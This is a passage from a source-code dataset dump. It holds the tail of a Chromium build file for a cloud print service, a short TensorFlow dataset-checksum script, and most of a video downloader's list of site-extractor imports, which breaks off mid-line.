[\n ['OS==\"win\"', {\n 'dependencies': [\n '<(DEPTH)/chrome/chrome.gyp:launcher_support',\n ],\n }],\n ],\n },\n {\n 'target_name': 'cloud_print_service',\n 'type': 'executable',\n 'include_dirs': [\n # To allow including \"version.h\"\n '<(SHARED_INTERMEDIATE_DIR)',\n ],\n 'sources': [\n 'win/cloud_print_service.cc',\n 'win/cloud_print_service.h',\n 'win/cloud_print_service.rc',\n 'win/resource.h',\n ],\n 'dependencies': [\n 'cloud_print_service_lib',\n ],\n 'conditions': [\n ['OS==\"win\"', {\n 'dependencies': [\n '<(DEPTH)/chrome/chrome.gyp:chrome_version_header',\n ],\n }],\n ],\n 'msvs_settings': {\n 'VCLinkerTool': {\n 'SubSystem': '1', # Set /SUBSYSTEM:CONSOLE\n 'UACExecutionLevel': '2', # /level='requireAdministrator'\n 'AdditionalDependencies': [\n 'secur32.lib',\n ],\n },\n },\n },\n ],\n}\n"} {"ext": "py", "sha": "1a3092a0502564d366bb3176ad46091e181d39bc", "content": "#Copyright 2019 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# Lint as: python3\n\"\"\"Download, computes and stores the checksums.\"\"\"\n\nfrom absl import app\nimport tensorflow_datasets as tfds\nfrom tensorflow_graphics.datasets.modelnet40 import ModelNet40\n\n\ndef main(_):\n config = tfds.download.DownloadConfig(register_checksums=True)\n modelnet40_builder = ModelNet40(data_dir=\"~/tensorflow_datasets\")\n modelnet40_builder.download_and_prepare(download_config=config)\n\n\nif __name__ == \"__main__\":\n app.run(main)\n"} {"ext": "py", "sha": "1a3093c150ac67fc7335e315f3c99aeb54e64e4b", "content": "# flake8: noqa\nfrom __future__ import unicode_literals\n\nfrom .abc import (\n ABCIE,\n ABCIViewIE,\n)\nfrom .abcnews import (\n AbcNewsIE,\n AbcNewsVideoIE,\n)\nfrom .abcotvs import (\n ABCOTVSIE,\n ABCOTVSClipsIE,\n)\nfrom .academicearth import AcademicEarthCourseIE\nfrom .acast import (\n ACastIE,\n ACastChannelIE,\n)\nfrom .adn import ADNIE\nfrom .adobeconnect import AdobeConnectIE\nfrom .adobetv import (\n AdobeTVEmbedIE,\n AdobeTVIE,\n AdobeTVShowIE,\n AdobeTVChannelIE,\n AdobeTVVideoIE,\n)\nfrom .adultswim import AdultSwimIE\nfrom .aenetworks import (\n AENetworksIE,\n AENetworksCollectionIE,\n AENetworksShowIE,\n HistoryTopicIE,\n HistoryPlayerIE,\n BiographyIE,\n)\nfrom .afreecatv import AfreecaTVIE\nfrom .airmozilla import AirMozillaIE\nfrom .aljazeera import AlJazeeraIE\nfrom .alphaporno import AlphaPornoIE\nfrom .amara import AmaraIE\nfrom .alura import (\n AluraIE,\n AluraCourseIE\n)\nfrom .amcnetworks import AMCNetworksIE\nfrom .animelab import (\n AnimeLabIE,\n AnimeLabShowsIE,\n)\nfrom .americastestkitchen import (\n AmericasTestKitchenIE,\n AmericasTestKitchenSeasonIE,\n)\nfrom .animeondemand import AnimeOnDemandIE\nfrom .anvato import AnvatoIE\nfrom .aol import AolIE\nfrom .allocine import AllocineIE\nfrom .aliexpress import AliExpressLiveIE\nfrom .apa import APAIE\nfrom .aparat import AparatIE\nfrom .appleconnect import AppleConnectIE\nfrom .appletrailers import (\n AppleTrailersIE,\n AppleTrailersSectionIE,\n)\nfrom .applepodcasts import ApplePodcastsIE\nfrom .archiveorg import (\n ArchiveOrgIE,\n YoutubeWebArchiveIE,\n)\nfrom .arcpublishing import ArcPublishingIE\nfrom .arkena import ArkenaIE\nfrom .ard import (\n ARDBetaMediathekIE,\n ARDIE,\n ARDMediathekIE,\n)\nfrom .arte import (\n ArteTVIE,\n ArteTVEmbedIE,\n ArteTVPlaylistIE,\n)\nfrom .arnes import ArnesIE\nfrom .asiancrush import (\n AsianCrushIE,\n AsianCrushPlaylistIE,\n)\nfrom .atresplayer import AtresPlayerIE\nfrom .atttechchannel import ATTTechChannelIE\nfrom .atvat import ATVAtIE\nfrom .audimedia import AudiMediaIE\nfrom .audioboom import AudioBoomIE\nfrom .audiomack import AudiomackIE, AudiomackAlbumIE\nfrom .audius import (\n AudiusIE,\n AudiusTrackIE,\n AudiusPlaylistIE,\n AudiusProfileIE,\n)\nfrom .awaan import (\n AWAANIE,\n AWAANVideoIE,\n AWAANLiveIE,\n AWAANSeasonIE,\n)\nfrom .azmedien import AZMedienIE\nfrom .baidu import BaiduVideoIE\nfrom .bandaichannel import BandaiChannelIE\nfrom .bandcamp import (\n BandcampIE,\n BandcampAlbumIE,\n BandcampWeeklyIE,\n BandcampMusicIE,\n)\nfrom .bannedvideo import BannedVideoIE\nfrom .bbc import (\n BBCCoUkIE,\n BBCCoUkArticleIE,\n BBCCoUkIPlayerEpisodesIE,\n BBCCoUkIPlayerGroupIE,\n BBCCoUkPlaylistIE,\n BBCIE,\n)\nfrom .beeg import BeegIE\nfrom .behindkink import BehindKinkIE\nfrom .bellmedia import BellMediaIE\nfrom .beatport import BeatportIE\nfrom .bet import BetIE\nfrom .bfi import BFIPlayerIE\nfrom .bfmtv import (\n BFMTVIE,\n BFMTVLiveIE,\n BFMTVArticleIE,\n)\nfrom .bibeltv import BibelTVIE\nfrom .bigflix import BigflixIE\nfrom .bild import BildIE\nfrom .bilibili import (\n BiliBiliIE,\n BiliBiliSearchIE,\n BilibiliCategoryIE,\n BiliBiliBangumiIE,\n BilibiliAudioIE,\n BilibiliAudioAlbumIE,\n BiliBiliPlayerIE,\n BilibiliChannelIE,\n)\nfrom .biobiochiletv import BioBioChileTVIE\nfrom .bitchute import (\n BitChuteIE,\n BitChuteChannelIE,\n)\nfrom .bitwave import (\n BitwaveReplayIE,\n BitwaveStreamIE,\n)\nfrom .biqle import BIQLEIE\nfrom .blackboardcollaborate import BlackboardCollaborateIE\nfrom .bleacherreport import (\n BleacherReportIE,\n BleacherReportCMSIE,\n)\nfrom .bloomberg import BloombergIE\nfrom .bokecc import BokeCCIE\nfrom .bongacams import BongaCamsIE\nfrom .bostonglobe import BostonGlobeIE\nfrom .box import BoxIE\nfrom .bpb import BpbIE\nfrom .br import (\n BRIE,\n BRMediathekIE,\n)\nfrom .bravotv import BravoTVIE\nfrom .breakcom import BreakIE\nfrom .brightcove import (\n BrightcoveLegacyIE,\n BrightcoveNewIE,\n)\nfrom .businessinsider import BusinessInsiderIE\nfrom .buzzfeed import BuzzFeedIE\nfrom .byutv import BYUtvIE\nfrom .c56 import C56IE\nfrom .camdemy import (\n CamdemyIE,\n CamdemyFolderIE\n)\nfrom .cammodels import CamModelsIE\nfrom .camwithher import CamWithHerIE\nfrom .canalplus import CanalplusIE\nfrom .canalc2 import Canalc2IE\nfrom .canvas import (\n CanvasIE,\n CanvasEenIE,\n VrtNUIE,\n DagelijkseKostIE,\n)\nfrom .carambatv import (\n CarambaTVIE,\n CarambaTVPageIE,\n)\nfrom .cartoonnetwork import CartoonNetworkIE\nfrom .cbc import (\n CBCIE,\n CBCPlayerIE,\n CBCWatchVideoIE,\n CBCWatchIE,\n CBCOlympicsIE,\n)\nfrom .cbs import CBSIE\nfrom .cbslocal import (\n CBSLocalIE,\n CBSLocalArticleIE,\n)\nfrom .cbsinteractive import CBSInteractiveIE\nfrom .cbsnews import (\n CBSNewsEmbedIE,\n CBSNewsIE,\n CBSNewsLiveVideoIE,\n)\nfrom .cbssports import (\n CBSSportsEmbedIE,\n CBSSportsIE,\n TwentyFourSevenSportsIE,\n)\nfrom .ccc import (\n CCCIE,\n CCCPlaylistIE,\n)\nfrom .ccma import CCMAIE\nfrom .cctv import CCTVIE\nfrom .cda import CDAIE\nfrom .ceskatelevize import (\n CeskaTelevizeIE,\n CeskaTelevizePoradyIE,\n)\nfrom .channel9 import Channel9IE\nfrom .charlierose import CharlieRoseIE\nfrom .chaturbate import ChaturbateIE\nfrom .chilloutzone import ChilloutzoneIE\nfrom .chirbit import (\n ChirbitIE,\n ChirbitProfileIE,\n)\nfrom .cinchcast import CinchcastIE\nfrom .cinemax import CinemaxIE\nfrom .ciscolive import (\n CiscoLiveSessionIE,\n CiscoLiveSearchIE,\n)\nfrom .cjsw import CJSWIE\nfrom .cliphunter import CliphunterIE\nfrom .clippit import ClippitIE\nfrom .cliprs import ClipRsIE\nfrom .clipsyndicate import ClipsyndicateIE\nfrom .closertotruth import CloserToTruthIE\nfrom .cloudflarestream import CloudflareStreamIE\nfrom .cloudy import CloudyIE\nfrom .clubic import ClubicIE\nfrom .clyp import ClypIE\nfrom .cmt import CMTIE\nfrom .cnbc import (\n CNBCIE,\n CNBCVideoIE,\n)\nfrom .cnn import (\n CNNIE,\n CNNBlogsIE,\n CNNArticleIE,\n)\nfrom .coub import CoubIE\nfrom .comedycentral import (\n ComedyCentralIE,\n ComedyCentralTVIE,\n)\nfrom .commonmistakes import CommonMistakesIE, UnicodeBOMIE\nfrom .commonprotocols import (\n MmsIE,\n RtmpIE,\n ViewSourceIE,\n)\nfrom .condenast import CondeNastIE\nfrom .contv import CONtvIE\nfrom .corus import CorusIE\nfrom .cracked import CrackedIE\nfrom .crackle import CrackleIE\nfrom .crooksandliars import CrooksAndLiarsIE\nfrom .crunchyroll import (\n CrunchyrollIE,\n CrunchyrollShowPlaylistIE\n)\nfrom .cspan import CSpanIE\nfrom .ctsnews import CtsNewsIE\nfrom .ctv import CTVIE\nfrom .ctvnews import CTVNewsIE\nfrom .cultureunplugged import CultureUnpluggedIE\nfrom .curiositystream import (\n CuriosityStreamIE,\n CuriosityStreamCollectionIE,\n)\nfrom .cwtv import CWTVIE\nfrom .dailymail import DailyMailIE\nfrom .dailymotion import (\n DailymotionIE,\n DailymotionPlaylistIE,\n DailymotionUserIE,\n)\nfrom .daum import (\n DaumIE,\n DaumClipIE,\n DaumPlaylistIE,\n DaumUserIE,\n)\nfrom .dbtv import DBTVIE\nfrom .dctp import DctpTvIE\nfrom .deezer import (\n DeezerPlaylistIE,\n DeezerAlbumIE,\n)\nfrom .democracynow import DemocracynowIE\nfrom .dfb import DFBIE\nfrom .dhm import DHMIE\nfrom .digg import DiggIE\nfrom .discoveryplusindia import (\n DiscoveryPlusIndiaIE,\n DiscoveryPlusIndiaShowIE,\n)\nfrom .dotsub import DotsubIE\nfrom .douyin import DouyinIE\nfrom .douyutv import (\n DouyuShowIE,\n DouyuTVIE,\n)\nfrom .dplay import (\n DPlayIE,\n DiscoveryPlusIE,\n HGTVDeIE,\n ScienceChannelIE\n)\nfrom .dreisat import DreiSatIE\nfrom .drbonanza import DRBonanzaIE\nfrom .drtuber import DrTuberIE\nfrom .drtv import (\n DRTVIE,\n DRTVLiveIE,\n)\nfrom .dtube import DTubeIE\nfrom .dvtv import DVTVIE\nfrom .duboku import (\n DubokuIE,\n DubokuPlaylistIE\n)\nfrom .dumpert import DumpertIE\nfrom .defense import DefenseGouvFrIE\nfrom .discovery import DiscoveryIE\nfrom .discoverygo import (\n DiscoveryGoIE,\n DiscoveryGoPlaylistIE,\n)\nfrom .discoverynetworks import DiscoveryNetworksDeIE\nfrom .discoveryvr import DiscoveryVRIE\nfrom .disney import DisneyIE\nfrom .dispeak import DigitallySpeakingIE\nfrom .doodstream import DoodStreamIE\nfrom .dropbox import DropboxIE\nfrom .dw import (\n DWIE,\n DWArticleIE,\n)\nfrom .eagleplatform import EaglePlatformIE\nfrom .ebaumsworld import EbaumsWorldIE\nfrom .echomsk import EchoMskIE\nfrom .egghead import (\n EggheadCourseIE,\n EggheadLessonIE,\n)\nfrom .ehow import EHowIE\nfrom .eighttracks import EightTracksIE\nfrom .einthusan import EinthusanIE\nfrom .eitb import EitbIE\nfrom .ellentube import (\n EllenTubeIE,\n EllenTubeVideoIE,\n EllenTubePlaylistIE,\n)\nfrom .elonet import ElonetIE\nfrom .elpais import ElPaisIE\nfrom .embedly import EmbedlyIE\nfrom .engadget import EngadgetIE\nfrom .epicon import (\n EpiconIE,\n EpiconSeriesIE,\n)\nfrom .eporner import EpornerIE\nfrom .eroprofile import (\n EroProfileIE,\n EroProfileAlbumIE,\n)\nfrom .escapist import EscapistIE\nfrom .espn import (\n ESPNIE,\n ESPNArticleIE,\n FiveThirtyEightIE,\n)\nfrom .esri import EsriVideoIE\nfrom .europa import EuropaIE\nfrom .expotv import ExpoTVIE\nfrom .expressen import ExpressenIE\nfrom .extremetube import ExtremeTubeIE\nfrom .eyedotv import EyedoTVIE\nfrom .facebook import (\n FacebookIE,\n FacebookPluginsVideoIE,\n)\nfrom .fancode import (\n FancodeVodIE,\n FancodeLiveIE\n)\n\nfrom .faz import FazIE\nfrom .fc2 import (\n FC2IE,\n FC2EmbedIE,\n)\nfrom .fczenit import FczenitIE\nfrom .filmmodu import FilmmoduIE\nfrom .filmon import (\n FilmOnIE,\n FilmOnChannelIE,\n)\nfrom .filmweb import FilmwebIE\nfrom .firsttv import FirstTVIE\nfrom .fivemin import FiveMinIE\nfrom .fivetv import FiveTVIE\nfrom .flickr import FlickrIE\nfrom .folketinget import FolketingetIE\nfrom .footyroom import FootyRoomIE\nfrom .formula1 import Formula1IE\nfrom .fourtube import (\n FourTubeIE,\n PornTubeIE,\n PornerBrosIE,\n FuxIE,\n)\nfrom .fox import FOXIE\nfrom .fox9 import (\n FOX9IE,\n FOX9NewsIE,\n)\nfrom .foxgay import FoxgayIE\nfrom .foxnews import (\n FoxNewsIE,\n FoxNewsArticleIE,\n)\nfrom .foxsports import FoxSportsIE\nfrom .franceculture import FranceCultureIE\nfrom .franceinter import FranceInterIE\nfrom .francetv import (\n FranceTVIE,\n FranceTVSiteIE,\n FranceTVEmbedIE,\n FranceTVInfoIE,\n FranceTVInfoSportIE,\n FranceTVJeunesseIE,\n GenerationWhatIE,\n CultureboxIE,\n)\nfrom .freesound import FreesoundIE\nfrom .freespeech import FreespeechIE\nfrom .freshlive import FreshLiveIE\nfrom .frontendmasters import (\n FrontendMastersIE,\n FrontendMastersLessonIE,\n FrontendMastersCourseIE\n)\nfrom .fujitv import FujiTVFODPlus7IE\nfrom .funimation import (\n FunimationIE,\n FunimationPageIE,\n FunimationShowIE,\n)\nfrom .funk import FunkIE\nfrom .fusion import FusionIE\nfrom .gab import GabTVIE\nfrom .gaia import GaiaIE\nfrom .gameinformer import GameInformerIE\nfrom .gamespot import GameSpotIE\nfrom .gamestar import GameStarIE\nfrom .gaskrank import GaskrankIE\nfrom .gazeta import GazetaIE\nfrom .gdcvault import GDCVaultIE\nfrom .gedidigital import GediDigitalIE\nfrom .generic import GenericIE\nfrom .gfycat import GfycatIE\nfrom .giantbomb import GiantBombIE\nfrom .giga import GigaIE\nfrom .glide import GlideIE\nfrom .globo import (\n GloboIE,\n GloboArticleIE,\n)\nfrom .go import GoIE\nfrom .godtube import GodTubeIE\nfrom .golem import GolemIE\nfrom .googledrive import GoogleDriveIE\nfrom .googlepodcasts import (\n GooglePodcastsIE,\n GooglePodcastsFeedIE,\n)\nfrom .googlesearch import GoogleSearchIE\nfrom .goshgay import GoshgayIE\nfrom .gputechconf import GPUTechConfIE\nfrom .groupon import GrouponIE\nfrom .hbo import HBOIE\nfrom .hearthisat import HearThisAtIE\nfrom .heise import HeiseIE\nfrom .hellporno import HellPornoIE\nfrom .helsinki import HelsinkiIE\nfrom .hentaistigma import HentaiStigmaIE\nfrom .hgtv import HGTVComShowIE\nfrom .hketv import HKETVIE\nfrom .hidive import HiDiveIE\nfrom .historicfilms import HistoricFilmsIE\nfrom .hitbox import HitboxIE, HitboxLiveIE\nfrom .hitrecord import HitRecordIE\nfrom .hornbunny import HornBunnyIE\nfrom .hotnewhiphop import HotNewHipHopIE\nfrom .hotstar import (\n HotStarIE,\n HotStarPlaylistIE,\n HotStarSeriesIE,\n)\nfrom .howcast import HowcastIE\nfrom .howstuffworks import HowStuffWorksIE\nfrom .hrfensehen import HRFernsehenIE\nfrom .hrti import (\n HRTiIE,\n HRTiPlaylistIE,\n)\nfrom .huajiao import HuajiaoIE\nfrom .huffpost import HuffPostIE\nfrom .hungama import (\n HungamaIE,\n HungamaSongIE,\n HungamaAlbumPlaylistIE,\n)\nfrom .hypem import HypemIE\nfrom .ign import (\n IGNIE,\n IGNVideoIE,\n IGNArticleIE,\n)\nfrom .iheart import (\n IHeartRadioIE,\n IHeartRadioPodcastIE,\n)\nfrom .imdb import (\n ImdbIE,\n ImdbListIE\n)\nfrom .imgur import (\n ImgurIE,\n ImgurAlbumIE,\n ImgurGalleryIE,\n)\nfrom .ina import InaIE\nfrom .inc import IncIE\nfrom .indavideo import IndavideoEmbedIE\nfrom .infoq import InfoQIE\nfrom .instagram import (\n InstagramIE,\n InstagramUserIE,\n InstagramTagIE,\n)\nfrom .internazionale import InternazionaleIE\nfrom .internetvideoarchive import InternetVideoArchiveIE\nfrom .iprima import IPrimaIE\nfrom .iqiyi import IqiyiIE\nfrom .ir90tv import Ir90TvIE\nfrom .itv import (\n ITVIE,\n ITVBTCCIE,\n)\nfrom .ivi import (\n IviIE,\n IviCompilationIE\n)\nfrom .ivideon import IvideonIE\nfrom .iwara import IwaraIE\nfrom .izlesene import IzleseneIE\nfrom .jamendo import (\n JamendoIE,\n JamendoAlbumIE,\n)\nfrom .jeuxvideo import JeuxVideoIE\nfrom .jove import JoveIE\nfrom .joj import JojIE\nfrom .jwplatform import JWPlatformIE\nfrom .kakao import KakaoIE\nfrom .kaltura import KalturaIE\nfrom .kankan import KankanIE\nfrom .karaoketv import KaraoketvIE\nfrom .karrierevideos import KarriereVideosIE\nfrom .keezmovies import KeezMoviesIE\nfrom .ketnet import KetnetIE\nfrom .khanacademy import (\n KhanAcademyIE,\n KhanAcademyUnitIE,\n)\nfrom .kickstarter import KickStarterIE\nfrom .kinja import KinjaEmbedIE\nfrom .kinopoisk import KinoPoiskIE\nfrom .konserthusetplay import KonserthusetPlayIE\nfrom .krasview import KrasViewIE\nfrom .ku6 import Ku6IE\nfrom .kusi import KUSIIE\nfrom .kuwo import (\n KuwoIE,\n KuwoAlbumIE,\n KuwoChartIE,\n KuwoSingerIE,\n KuwoCategoryIE,\n KuwoMvIE,\n)\nfrom .la7 import (\n LA7IE,\n LA7PodcastEpisodeIE,\n LA7PodcastIE,\n)\nfrom .laola1tv import (\n Laola1TvEmbedIE,\n Laola1TvIE,\n EHFTVIE,\n ITTFIE,\n)\nfrom .lbry import (\n LBRYIE,\n LBRYChannelIE,\n)\nfrom .lci import LCIIE\nfrom .lcp import (\n LcpPlayIE,\n LcpIE,\n)\nfrom .lecture2go import Lecture2GoIE\nfrom .lecturio import (\n LecturioIE,\n LecturioCourseIE,\n LecturioDeCourseIE,\n)\nfrom .leeco import (\n LeIE,\n LePlaylistIE,\n LetvCloudIE,\n)\nfrom .lego import LEGOIE\nfrom .lemonde import LemondeIE\nfrom .lenta import LentaIE\nfrom .libraryofcongress import LibraryOfCongressIE\nfrom .libsyn import LibsynIE\nfrom .lifenews import (\n LifeNewsIE,\n LifeEmbedIE,\n)\nfrom .limelight import (\n LimelightMediaIE,\n LimelightChannelIE,\n LimelightChannelListIE,\n)\nfrom .line import (\n LineTVIE,\n LineLiveIE,\n LineLiveChannelIE,\n)\nfrom .linkedin import (\n LinkedInLearningIE,\n LinkedInLearningCourseIE,\n)\nfrom .linuxacademy import LinuxAcademyIE\nfrom .litv import LiTVIE\nfrom .livejournal import LiveJournalIE\nfrom .livestream import (\n LivestreamIE,\n LivestreamOriginalIE,\n LivestreamShortenerIE,\n)\nfrom .lnkgo import LnkGoIE\nfrom .localnews8 import LocalNews8IE\nfrom .lovehomeporn import LoveHomePornIE\nfrom .lrt import LRTIE\nfrom .lynda import (\n LyndaIE,\n LyndaCourseIE\n)\nfrom .m6 import M6IE\nfrom .magentamusik360 import MagentaMusik360IE\nfrom .mailru import (\n MailRuIE,\n MailRuMusicIE,\n MailRuMusicSearchIE,\n)\nfrom .malltv import MallTVIE\nfrom .mangomolo import (\n MangomoloVideoIE,\n MangomoloLiveIE,\n)\nfrom .manoto import (\n ManotoTVIE,\n ManotoTVShowIE,\n ManotoTVLiveIE,\n)\nfrom .manyvids import ManyVidsIE\nfrom .maoritv import MaoriTVIE\nfrom .markiza import (\n MarkizaIE,\n MarkizaPageIE,\n)\nfrom .massengeschmacktv import MassengeschmackTVIE\nfrom .matchtv import MatchTVIE\nfrom .mdr import MDRIE\nfrom .medaltv import MedalTVIE\nfrom .mediaset import MediasetIE\nfrom .mediasite import (\n MediasiteIE,\n MediasiteCatalogIE,\n MediasiteNamedCatalogIE,\n)\nfrom .medici import MediciIE\nfrom .megaphone import MegaphoneIE\nfrom .meipai import MeipaiIE\nfrom .melonvod import MelonVODIE\nfrom .meta import METAIE\nfrom .metacafe import MetacafeIE\nfrom .metacritic import MetacriticIE\nfrom .mgoon import MgoonIE\nfrom .mgtv import MGTVIE\nfrom .miaopai import MiaoPaiIE\nfrom .microsoftvirtualacademy import (\n MicrosoftVirtualAcademyIE,\n MicrosoftVirtualAcademyCourseIE,\n)\nfrom .mildom import (\n MildomIE,\n MildomVodIE,\n MildomUserVodIE,\n)\nfrom .minds import (\n MindsIE,\n MindsChannelIE,\n MindsGroupIE,\n)\nfrom .ministrygrid import MinistryGridIE\nfrom .minoto import MinotoIE\nfrom .miomio import MioMioIE\nfrom .mirrativ import (\n MirrativIE,\n MirrativUserIE,\n)\nfrom .mit import TechTVMITIE, OCWMITIE\nfrom .mitele import MiTeleIE\nfrom .mixcloud import (\n MixcloudIE,\n MixcloudUserIE,\n MixcloudPlaylistIE,\n)\nfrom .mlb import (\n MLBIE,\n MLBVideoIE,\n)\nfrom .mnet import MnetIE\nfrom .moevideo import MoeVideoIE\nfrom .mofosex import (\n MofosexIE,\n MofosexEmbedIE,\n)\nfrom .mojvideo import MojvideoIE\nfrom .morningstar import MorningstarIE\nfrom .motherless import (\n MotherlessIE,\n MotherlessGroupIE\n)\nfrom .motorsport import MotorsportIE\nfrom .movieclips import MovieClipsIE\nfrom .moviezine import MoviezineIE\nfrom .movingimage import MovingImageIE\nfrom .msn import MSNIE\nfrom .mtv import (\n MTVIE,\n MTVVideoIE,\n MTVServicesEmbeddedIE,\n MTVDEIE,\n MTVJapanIE,\n MTVItaliaIE,\n MTVItaliaProgrammaIE,\n)\nfrom .muenchentv import MuenchenTVIE\nfrom .mwave import MwaveIE, MwaveMeetGreetIE\nfrom .mxplayer import (\n MxplayerIE,\n MxplayerShowIE,\n)\nfrom .mychannels import MyChannelsIE\nfrom .myspace import MySpaceIE, MySpaceAlbumIE\nfrom .myspass import MySpassIE\nfrom .myvi import (\n MyviIE,\n MyviEmbedIE,\n)\nfrom .myvideoge import MyVideoGeIE\nfrom .myvidster import MyVidsterIE\nfrom .nationalgeographic import (\n NationalGeographicVideoIE,\n NationalGeographicTVIE,\n)\nfrom .naver import (\n NaverIE,\n NaverLiveIE,\n)\nfrom .nba import (\n NBAWatchEmbedIE,\n NBAWatchIE,\n NBAWatchCollectionIE,\n NBAEmbedIE,\n NBAIE,\n NBAChannelIE,\n)\nfrom .nbc import (\n NBCIE,\n NBCNewsIE,\n NBCOlympicsIE,\n NBCOlympicsStreamIE,\n NBCSportsIE,\n NBCSportsStreamIE,\n NBCSportsVPlayerIE,\n)\nfrom .ndr import (\n NDRIE,\n NJoyIE,\n NDREmbedBaseIE,\n NDREmbedIE,\n NJoyEmbedIE,\n)\nfrom .ndtv import NDTVIE\nfrom .nebula import NebulaIE\nfrom .nerdcubed import NerdCubedFeedIE\nfrom .netzkino import NetzkinoIE\nfrom .neteasemusic import (\n NetEaseMusicIE,\n NetEaseMusicAlbumIE,\n NetEaseMusicSingerIE,\n NetEaseMusicListIE,\n NetEaseMusicMvIE,\n NetEaseMusicProgramIE,\n NetEaseMusicDjRadioIE,\n)\nfrom .newgrounds import (\n NewgroundsIE,\n NewgroundsPlaylistIE,\n)\nfrom .newstube import NewstubeIE\nfrom .nextmedia import (\n NextMediaIE,\n NextMediaActionNewsIE,\n AppleDailyIE,\n NextTVIE,\n)\nfrom .nexx import (\n NexxIE,\n NexxEmbedIE,\n)\nfrom .nfhsnetwork import NFHSNetworkIE\nfrom .nfl import (\n NFLIE,\n NFLArticleIE,\n)\nfrom .nhk import (\n NhkVodIE,\n NhkVodProgramIE,\n)\nfrom .nhl import NHLIE\nfrom .nick import (\n NickIE,\n NickBrIE,\n NickDeIE,\n NickNightIE,\n NickRuIE,\n)\n\nfrom .niconico import (\n NiconicoIE,\n NiconicoPlaylistIE,\n NiconicoUserIE,\n NicovideoSearchDateIE,\n NicovideoSearchIE,\n NicovideoSearchURLIE,\n)\nfrom .ninecninemedia import NineCNineMediaIE\nfrom .ninegag import NineGagIE\nfrom .ninenow import NineNowIE\nfrom .nintendo import NintendoIE\nfrom .nitter import NitterIE\nfrom .njpwworld import NJPWWorldIE\nfrom .nobelprize import NobelPrizeIE\nfrom .nonktube import NonkTubeIE\nfrom .noovo import NoovoIE\nfrom .normalboots import NormalbootsIE\nfrom .nosvideo import NosVideoIE\nfrom .nova import (\n NovaEmbedIE,\n NovaIE,\n)\nfrom .nowness import (\n NownessIE,\n NownessPlaylistIE,\n NownessSeriesIE,\n)\nfrom .noz import NozIE\nfrom .npo import (\n AndereTijdenIE,\n NPOIE,\n NPOLiveIE,\n NPORadioIE,\n NPORadioFragmentIE,\n SchoolTVIE,\n HetKlokhuisIE,\n VPROIE,\n WNLIE,\n)\nfrom .npr import NprIE\nfrom .nrk import (\n NRKIE,\n NRKPlaylistIE,\n NRKSkoleIE,\n NRKTVIE,\n NRKTVDirekteIE,\n NRKRadioPodkastIE,\n NRKTVEpisodeIE,\n NRKTVEpisodesIE,\n NRKTVSeasonIE,\n NRKTVSeriesIE,\n)\nfrom .nrl import NRLTVIE\nfrom .ntvcojp import NTVCoJpCUIE\nfrom .ntvde import NTVDeIE\nfrom .ntvru import NTVRuIE\nfrom .nytimes import (\n NYTimesIE,\n NYTimesArticleIE,\n NYTimesCookingIE,\n)\nfrom .nuvid import NuvidIE\nfrom .nzz import NZZIE\nfrom .odatv import OdaTVIE\nfrom .odnoklassniki import OdnoklassnikiIE\nfrom .oktoberfesttv import OktoberfestTVIE\nfrom .ondemandkorea import OnDemandKoreaIE\nfrom .onet import (\n OnetIE,\n OnetChannelIE,\n OnetMVPIE,\n OnetPlIE,\n)\nfrom .onionstudios import OnionStudiosIE\nfrom .ooyala import (\n OoyalaIE,\n OoyalaExternalIE,\n)\nfrom .openrec import (\n OpenRecIE,\n OpenRecCaptureIE,\n)\nfrom .ora import OraTVIE\nfrom .orf import (\n ORFTVthekIE,\n ORFFM4IE,\n ORFFM4StoryIE,\n ORFOE1IE,\n ORFOE3IE,\n ORFNOEIE,\n ORFWIEIE,\n ORFBGLIE,\n ORFOOEIE,\n ORFSTMIE,\n ORFKTNIE,\n ORFSBGIE,\n ORFTIRIE,\n ORFVBGIE,\n ORFIPTVIE,\n)\nfrom .outsidetv import OutsideTVIE\nfrom .packtpub import (\n PacktPubIE,\n PacktPubCourseIE,\n)\nfrom .palcomp3 import (\n PalcoMP3IE,\n PalcoMP3ArtistIE,\n PalcoMP3VideoIE,\n)\nfrom .pandoratv import PandoraTVIE\nfrom .paramountplus import (\n ParamountPlusIE,\n ParamountPlusSeriesIE,\n)\nfrom .parliamentliveuk import ParliamentLiveUKIE\nfrom .parlview import ParlviewIE\nfrom .patreon import (\n PatreonIE,\n PatreonUserIE\n)\nfrom .pbs import PBSIE\nfrom .pearvideo import PearVideoIE\nfrom .peertube import PeerTubeIE\nfrom .peloton import (\n PelotonIE,\n PelotonLiveIE\n)\nfrom .people import PeopleIE\nfrom .performgroup import PerformGroupIE\nfrom .periscope import (\n PeriscopeIE,\n PeriscopeUserIE,\n)\nfrom .philharmoniedeparis import PhilharmonieDeParisIE\nfrom .phoenix import PhoenixIE\nfrom .photobucket import PhotobucketIE\nfrom .picarto import (\n PicartoIE,\n PicartoVodIE,\n)\nfrom .piksel import PikselIE\nfrom .pinkbike import PinkbikeIE\nfrom .pinterest import (\n PinterestIE,\n PinterestCollectionIE,\n)\nfrom .pladform import PladformIE\nfrom .platzi import (\n PlatziIE,\n PlatziCourseIE,\n)\nfrom .playfm import PlayFMIE\nfrom .playplustv import PlayPlusTVIE\nfrom .plays import PlaysTVIE\nfrom .playstuff import PlayStuffIE\nfrom .playtvak import PlaytvakIE\nfrom .playvid import PlayvidIE\nfrom .playwire import PlaywireIE\nfrom .plutotv import PlutoTVIE\nfrom .pluralsight import (\n PluralsightIE,\n PluralsightCourseIE,\n)\nfrom .podomatic import PodomaticIE\nfrom .pokemon import (\n PokemonIE,\n PokemonWatchIE,\n)\nfrom .polskieradio import (\n PolskieRadioIE,\n PolskieRadioCategoryIE,\n)\nfrom .popcorntimes import PopcorntimesIE\nfrom .popcorntv import PopcornTVIE\nfrom .porn91 import Porn91IE\nfrom .porncom import PornComIE\nfrom .pornflip import PornFlipIE\nfrom .pornhd import PornHdIE\nfrom .pornhub import (\n PornHubIE,\n PornHubUserIE,\n PornHubPlaylistIE,\n PornHubPagedVideoListIE,\n PornHubUserVideosUploadIE,\n)\nfrom .pornotube import PornotubeIE\nfrom .pornovoisines import PornoVoisinesIE\nfrom .pornoxo import PornoXOIE\nfrom .puhutv import (\n PuhuTVIE,\n PuhuTVSerieIE,\n)\nfrom .presstv import PressTVIE\nfrom .projectveritas import ProjectVeritasIE\nfrom .prosiebensat1 import ProSiebenSat1IE\nfrom .puls4 import 